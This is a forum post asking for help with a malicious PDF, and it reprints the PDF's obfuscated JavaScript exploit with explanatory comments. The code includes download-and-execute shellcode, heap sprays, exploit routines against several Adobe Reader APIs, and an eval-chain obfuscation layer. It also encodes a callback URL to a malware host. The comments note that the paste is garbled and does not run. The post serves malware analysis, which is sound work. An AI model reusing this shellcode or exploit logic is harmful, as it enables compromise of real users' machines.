I received a malicious PDF and ran it through both the automated analysers "wepawet" and "jsunpack". Finally I used "malwaretracker.com" to learn which streams are present in the PDF file.
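/**
 * Drops every character equal to `uaueeuio` from `btiegea` and returns the rest.
 *
 * In this sample the filter character is the empty string, and `charAt()` never
 * returns '', so the function hands its input back unchanged: as pasted it is a
 * no-op decoding layer. The filter character is exposed as an optional second
 * parameter so an analyst can re-run the decode with the character the live
 * sample actually used (presumably lost in transcription; confirm against the
 * original PDF stream).
 *
 * @param {string} btiegea - input text (here, the obfuscated second-stage script)
 * @param {string} [uaueeuio=''] - single character to strip; '' strips nothing
 * @returns {string} the input with every occurrence of the filter character removed
 */
function yeqiupve(btiegea, uaueeuio = '')
{
  let efyliefq = '';
  // Index loop rather than for...of to keep the original charAt()/UTF-16-unit
  // semantics. The original left the loop index undeclared, which leaks a global
  // in sloppy mode and throws a ReferenceError in strict mode / ES modules.
  for (let tfaeopiul = 0; tfaeopiul < btiegea.length; tfaeopiul++)
  {
    const aeeoeyu = btiegea.charAt(tfaeopiul);
    if (aeeoeyu !== uaueeuio)
    {
      efyliefq += aeeoeyu;
    }
  }
  return efyliefq;
}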
// --- Stage 2: the Adobe Reader exploit script, carried as one string literal ---
// Everything from the opening quote on the next line to the closing `");` is a
// single string. It only becomes code when the eval chain further down runs it,
// so static scanners that look for the API names below never see them in code.
// What the embedded text does (read directly from the lines below):
//   * shcode(url): returns a %u-encoded shellcode blob with `url` appended, so
//     the URL sits as data immediately behind the shellcode. The %uXXXX groups
//     in each shcode() argument are plain ASCII packed two bytes per group, low
//     byte first (%u7468 -> "ht", %u7074 -> "tp", ...): each decodes to an
//     http:// URL on the host cvbtd.co.cc (path /vdfg/exe.php) with a query of
//     the form exp=PDF (<name>)&key=<hex>, where <name> is newPlayer, printf,
//     GetIcon or Collab - the callback reports which routine fired. Treat the
//     host and path as indicators of compromise for blocklists and log hunting.
//   * nplayer(), printf(), geticon(), collab(): one routine per Acrobat
//     JavaScript API targeted - this.media.newPlayer (pasted as `nePlayer`),
//     util.printf("%45000f", <huge number>), Collab.getIcon, and
//     Collab.collectEmailInfo. Each first fills an array with %u9090 padding plus
//     the shellcode (the heap spray the post mentions), then calls the API with
//     an oversized argument.
//   * The tail reads app.viewerVersion (pasted `vieerVersion`) and the EScript
//     plug-in version from app.plugIns and dispatches to the routine chosen for
//     that reader version; the last branch's version test is always true.
// Transcript caveat: as pasted, the letters w and z are missing throughout
// (`hile`, `ne Array`, `headersie`), the plug-in loop reads `aPlugins.name`
// without an index, and several spray loops assign to the array variable instead
// of an element, so this listing is a lossy copy of the original stream and is
// not runnable as-is; presumably the filter character of yeqiupve() above was
// lost the same way.
// Useful static signatures: long %u9090 runs, unescape()+substring spray loops,
// util.printf with a huge width specifier, Collab.getIcon / collectEmailInfo
// with padded arguments, and the split-name eval calls after this literal.
var uxivqia = yeqiupve("\r\n\r\nfunction shcode(url)\r\n
{
\r\n\r\nsh = \"%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\";
\r\nreturn sh+url;
\r\n
}
\r\n\r\nfunction nplayer()
{
\r\nfunction kbve()\r\n
{
\r\nvar eobe=\"p@111111111111111111111111 : yyyy111\";
\r\nutil.printd(eobe, ne Date());
\r\n
}
\r\n\r\nvar grix=12000;
\r\njucobu=ne Array();
\r\nvar klkng = \"%u9090%u9090\";
\r\nvar hjnalb8=shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u6E28%u7765%u6C50%u7961%u7265%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\");
\r\nklkng=unescape(klkng);
\r\nhjnalb8=unescape(hjnalb8);
\r\n\r\nhile(klkng.length <= 0x8000)
{
klkng+=klkng;
}
\r\nklkng=klkng.substr(0,0x8000 - hjnalb8.length);
\r\nfor(ffam=0;
ffam<grix;
ffam++)
{
jucobu[ffam]=klkng + hjnalb8;
}
\r\nif(grix)
{
kbve();
kbve();
try
{
this.media.nePlayer(null);
}
catch(e)
{
}
kbve();
}
\r\n
}
\r\n\r\nfunction printf()
{
\r\n\r\nvar payload=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u7028%u6972%u746E%u2966%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
\r\n\r\nvar nop =\"\";
\r\nfor (iCnt=128;
iCnt>=0;
--iCnt) nop += unescape(\"%u9090%u9090%u9090%u9090%u9090\");
\r\nheapblock = nop + payload;
\r\nbigblock = unescape(\"%u9090%u9090\");
\r\nheadersie = 20;
\r\nspray = headersie+heapblock.length;
\r\nhile (bigblock.length<spray) bigblock+=bigblock;
\r\nfillblock = bigblock.substring(0, spray);
\r\nblock = bigblock.substring(0, bigblock.length-spray);
\r\nhile(block.length+spray < 0x40000) block = block+block+fillblock;
\r\nmem = ne Array();
\r\nfor (i=0;
i<1400;
i++) mem = block + heapblock;
\r\n\r\nvar num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888\r\nutil.printf(\"%45000f\",num);
\r\n
}
\r\n\r\nfunction geticon()
{
\r\n\r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4728%u7465%u6349%u6E6F%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\"));
\r\n\r\ngarbage = unescape(\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\") + shellcode;
\r\nnopblock = unescape(\"%u9090%u9090\");
\r\nheadersie = 10;
\r\nacl = headersie+garbage.length;
\r\n\r\nhile (nopblock.length<acl) nopblock+=nopblock;
\r\nfillblock = nopblock.substring(0, acl);
\r\nblock = nopblock.substring(0, nopblock.length-acl);
\r\nhile(block.length+acl<0x40000) block = block+block+fillblock;
\r\nmemory = ne Array();
\r\nfor (i=0;
i<180;
i++) memory = block + garbage;
\r\nvar buffersie = 4012;
\r\nvar buffer = Array(buffersie);
\r\nfor (i=0;
i<buffersie;
i++)\r\n
{
\r\nbuffer = unescape(\"%0a%0a%0a%0a\");
\r\n
}
\r\n\r\nCollab.getIcon(buffer+\"_N.bundle\");
\r\n
}
\r\n\r\nfunction collab()
{
\r\n\r\nfunction fix_it(yarsp,len)
{
\r\nhile(yarsp.length*2<len)
{
yarsp+=yarsp;
}
\r\nyarsp=yarsp.substring(0,len/2);
\r\nreturn yarsp;
}
\r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4328%u6C6F%u616C%u2962%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
\r\nvar mem_array=ne Array();
\r\nvar cc=0x0c0c0c0c;
\r\nvar addr=0x400000;
\r\nvar sc_len=shellcode.length*2;
\r\nvar len=addr-(sc_len+0x38);
\r\nvar yarsp=unescape(\"%u9090%u9090\");
\r\nyarsp=fix_it(yarsp,len);
\r\nvar count2=(cc-0x400000)/addr;
\r\nfor(var count=0;
count<count2;
count++)
{
mem_array[count]=yarsp+shellcode;
}
\r\nvar overflo=unescape(\"%u0c0c%u0c0c\");
\r\nhile(overflo.length<44952)
{
overflo+=overflo;
}
\r\nthis.collabStore=Collab.collectEmailInfo(
{
subj:\"\",msg:overflo
}
);
\r\n\r\n
}
\r\n\r\naPlugins = app.plugIns;
\r\nvar sv=parseInt(app.vieerVersion.toString().charAt(0));
\r\nfor (var i=0;
i < aPlugins.length;
i++)\r\n
{
\r\n if (aPlugins.name==\"EScript\")\r\n
{
\r\n var lv=aPlugins.version;
\r\n
}
\r\n
}
\r\nif ((lv==9)||((sv==8)&&(lv<=8.12)))\r\n
{
\r\n geticon();
\r\n
}
\r\nelse if (lv==7.1)\r\n
{
\r\n printf();
\r\n
}
\r\nelse if (((sv==6)||(sv==7))&&(lv<7.11))\r\n
{
\r\n collab();
\r\n
}
\r\nelse if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))\r\n
{
\r\n nplayer();
\r\n
}
\r\n\r\n");
// --- Stage 3: hand the stage-2 text to eval through a chain of aliases ---
// `''+x+''` is just a string copy; `loeiize` and `aruibdoxy0` are implicit globals.
loeiize = ''+uxivqia+'';
// Number of alias hops (aruibdoxy1 ... aruibdoxy500) before the final eval.
var kyvxga = 500;
var egoioany = '';
// Head of the chain: every later alias copies the previous one, so after the
// loop aruibdoxy500 still holds the exact stage-2 text.
aruibdoxy0 = loeiize;
for(mauojbqob=0;
mauojbqob<kyvxga;
mauojbqob++)
{
var ghsd = mauojbqob+1;
// Appends one `var aruibdoxyN = aruibdoxyN-1;` statement per iteration. The
// literal holds a raw line break in this paste (invalid as-is; the original
// stream presumably used an escaped newline or the forum wrapped it).
egoioany+='var aruibdoxy'+ghsd+' = aruibdoxy'+mauojbqob+';
';
// `eval` is called through a computed member with its name split ('ev'+'al')
// so that a naive search for `eval(` finds nothing; the whole accumulated
// statement list is re-evaluated on every iteration, 500 times in total, which
// does no useful work - likely there only to slow or confuse analysers.
this['ev'+'al'](egoioany);
}
// The stage-2 script becomes live code only here: an eval hook in a sandbox or
// a breakpoint on this call captures the decoded text in one piece.
this['eva'+'l']('this[\'eva\'+\'l\'](aruibdoxy'+kyvxga+');
');
I believe the shellcode is the following:
%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\
The "heap spray" technique is used here, and I am not sure about the URL that travels with the shellcode. Please help me find the URL!
Thanks
MAD